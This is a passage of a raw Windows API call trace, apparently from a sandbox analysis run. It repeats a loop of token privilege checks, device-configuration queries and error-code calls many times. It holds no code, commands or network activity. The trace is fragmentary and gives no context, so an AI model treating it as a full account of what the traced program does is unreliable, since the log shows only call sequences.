0x3f0 [0084.875] GetCurrentProcess () returned 0xffffffff [0084.875] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.875] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.875] SetLastError (dwErrCode=0x522) [0084.875] CloseHandle (hObject=0x114) returned 1 [0084.875] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.875] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.875] GetLastError () returned 0x578 [0084.875] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.875] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.875] GetCurrentThread () returned 0xfffffffe [0084.875] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.875] GetLastError () returned 0x3f0 [0084.875] GetCurrentProcess () returned 0xffffffff [0084.875] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.875] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.875] SetLastError (dwErrCode=0x522) [0084.875] CloseHandle (hObject=0x114) returned 1 [0084.875] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.875] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.875] GetLastError () returned 0x578 [0084.875] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.875] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.875] GetCurrentThread () returned 0xfffffffe [0084.875] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.875] GetLastError () returned 0x3f0 [0084.875] GetCurrentProcess () returned 0xffffffff [0084.875] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.875] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.875] SetLastError (dwErrCode=0x522) [0084.875] CloseHandle (hObject=0x114) returned 1 [0084.875] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.875] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.875] GetLastError () returned 0x578 [0084.876] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.876] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.876] GetCurrentThread () returned 0xfffffffe [0084.876] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.876] GetLastError () returned 0x3f0 [0084.876] GetCurrentProcess () returned 0xffffffff [0084.876] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.876] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.876] SetLastError (dwErrCode=0x522) [0084.876] CloseHandle (hObject=0x114) returned 1 [0084.876] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.876] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.876] GetLastError () returned 0x578 [0084.876] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.876] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.876] GetCurrentThread () returned 0xfffffffe [0084.876] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.876] GetLastError () returned 0x3f0 [0084.876] GetCurrentProcess () returned 0xffffffff [0084.876] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.876] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.876] SetLastError (dwErrCode=0x522) [0084.876] CloseHandle (hObject=0x114) returned 1 [0084.876] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.876] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.876] GetLastError () returned 0x578 [0084.876] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.876] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.876] GetCurrentThread () returned 0xfffffffe [0084.876] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.876] GetLastError () returned 0x3f0 [0084.876] GetCurrentProcess () returned 0xffffffff [0084.876] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.876] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.876] SetLastError (dwErrCode=0x522) [0084.876] CloseHandle (hObject=0x114) returned 1 [0084.876] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.876] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.876] GetLastError () returned 0x578 [0084.876] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.876] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.876] GetCurrentThread () returned 0xfffffffe [0084.877] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.877] GetLastError () returned 0x3f0 [0084.877] GetCurrentProcess () returned 0xffffffff [0084.877] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.877] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.877] SetLastError (dwErrCode=0x522) [0084.877] CloseHandle (hObject=0x114) returned 1 [0084.877] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.877] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.877] GetLastError () returned 0x578 [0084.877] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.877] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.877] GetCurrentThread () returned 0xfffffffe [0084.877] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.877] GetLastError () returned 0x3f0 [0084.877] GetCurrentProcess () returned 0xffffffff [0084.877] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.877] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.877] SetLastError (dwErrCode=0x522) [0084.877] CloseHandle (hObject=0x114) returned 1 [0084.877] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.877] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.877] GetLastError () returned 0x578 [0084.877] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.877] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.877] GetCurrentThread () returned 0xfffffffe [0084.877] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.877] GetLastError () returned 0x3f0 [0084.877] GetCurrentProcess () returned 0xffffffff [0084.877] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.877] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.877] SetLastError (dwErrCode=0x522) [0084.877] CloseHandle (hObject=0x114) returned 1 [0084.877] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.877] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.877] GetLastError () returned 0x578 [0084.877] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.878] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.878] GetCurrentThread () returned 0xfffffffe [0084.878] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.878] GetLastError () returned 0x3f0 [0084.878] GetCurrentProcess () returned 0xffffffff [0084.878] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.878] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.878] SetLastError (dwErrCode=0x522) [0084.878] CloseHandle (hObject=0x114) returned 1 [0084.878] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.878] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.878] GetLastError () returned 0x578 [0084.878] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.878] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.878] GetCurrentThread () returned 0xfffffffe [0084.878] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.878] GetLastError () returned 0x3f0 [0084.878] GetCurrentProcess () returned 0xffffffff [0084.878] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.878] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.878] SetLastError (dwErrCode=0x522) [0084.878] CloseHandle (hObject=0x114) returned 1 [0084.878] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.878] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.878] GetLastError () returned 0x578 [0084.878] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.878] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.878] GetCurrentThread () returned 0xfffffffe [0084.878] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.878] GetLastError () returned 0x3f0 [0084.878] GetCurrentProcess () returned 0xffffffff [0084.878] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.878] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.878] SetLastError (dwErrCode=0x522) [0084.878] CloseHandle (hObject=0x114) returned 1 [0084.878] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.879] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.879] GetLastError () returned 0x578 [0084.879] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.879] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.879] GetCurrentThread () returned 0xfffffffe [0084.879] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.879] GetLastError () returned 0x3f0 [0084.879] GetCurrentProcess () returned 0xffffffff [0084.879] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.879] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.879] SetLastError (dwErrCode=0x522) [0084.879] CloseHandle (hObject=0x114) returned 1 [0084.879] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.879] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.879] GetLastError () returned 0x578 [0084.879] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.879] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.879] GetCurrentThread () returned 0xfffffffe [0084.879] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.879] GetLastError () returned 0x3f0 [0084.879] GetCurrentProcess () returned 0xffffffff [0084.879] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.879] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.879] SetLastError (dwErrCode=0x522) [0084.879] CloseHandle (hObject=0x114) returned 1 [0084.879] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.879] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.879] GetLastError () returned 0x578 [0084.879] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.879] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.879] GetCurrentThread () returned 0xfffffffe [0084.879] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.879] GetLastError () returned 0x3f0 [0084.879] GetCurrentProcess () returned 0xffffffff [0084.879] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.879] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.879] SetLastError (dwErrCode=0x522) [0084.879] CloseHandle (hObject=0x114) returned 1 [0084.879] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.879] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.880] GetLastError () returned 0x578 [0084.880] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.880] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.880] GetCurrentThread () returned 0xfffffffe [0084.880] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.880] GetLastError () returned 0x3f0 [0084.880] GetCurrentProcess () returned 0xffffffff [0084.880] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.880] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.880] SetLastError (dwErrCode=0x522) [0084.880] CloseHandle (hObject=0x114) returned 1 [0084.880] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.880] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.880] GetLastError () returned 0x578 [0084.880] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.880] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.880] GetCurrentThread () returned 0xfffffffe [0084.880] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.880] GetLastError () returned 0x3f0 [0084.880] GetCurrentProcess () returned 0xffffffff [0084.880] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.880] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.880] SetLastError (dwErrCode=0x522) [0084.880] CloseHandle (hObject=0x114) returned 1 [0084.880] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.880] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.880] GetLastError () returned 0x578 [0084.880] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.880] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.880] GetCurrentThread () returned 0xfffffffe [0084.880] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.880] GetLastError () returned 0x3f0 [0084.880] GetCurrentProcess () returned 0xffffffff [0084.880] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.880] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.880] SetLastError (dwErrCode=0x522) [0084.880] CloseHandle (hObject=0x114) returned 1 [0084.880] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.880] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.880] GetLastError () returned 0x578 [0084.880] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.881] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.881] GetCurrentThread () returned 0xfffffffe [0084.881] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.881] GetLastError () returned 0x3f0 [0084.881] GetCurrentProcess () returned 0xffffffff [0084.881] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.881] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.881] SetLastError (dwErrCode=0x522) [0084.881] CloseHandle (hObject=0x114) returned 1 [0084.881] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.881] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.881] GetLastError () returned 0x578 [0084.881] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.881] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.881] GetCurrentThread () returned 0xfffffffe [0084.881] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.881] GetLastError () returned 0x3f0 [0084.881] GetCurrentProcess () returned 0xffffffff [0084.881] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.881] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.881] SetLastError (dwErrCode=0x522) [0084.881] CloseHandle (hObject=0x114) returned 1 [0084.881] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.881] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.881] GetLastError () returned 0x578 [0084.881] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.881] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.881] GetCurrentThread () returned 0xfffffffe [0084.881] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.881] GetLastError () returned 0x3f0 [0084.881] GetCurrentProcess () returned 0xffffffff [0084.881] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.881] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.881] SetLastError (dwErrCode=0x522) [0084.881] CloseHandle (hObject=0x114) returned 1 [0084.881] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.881] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.881] GetLastError () returned 0x578 [0084.881] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.881] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.881] GetCurrentThread () returned 0xfffffffe [0084.881] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.881] GetLastError () returned 0x3f0 [0084.881] GetCurrentProcess () returned 0xffffffff [0084.882] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.882] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.882] SetLastError (dwErrCode=0x522) [0084.882] CloseHandle (hObject=0x114) returned 1 [0084.882] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.882] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.882] GetLastError () returned 0x578 [0084.882] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.882] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.882] GetCurrentThread () returned 0xfffffffe [0084.882] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: 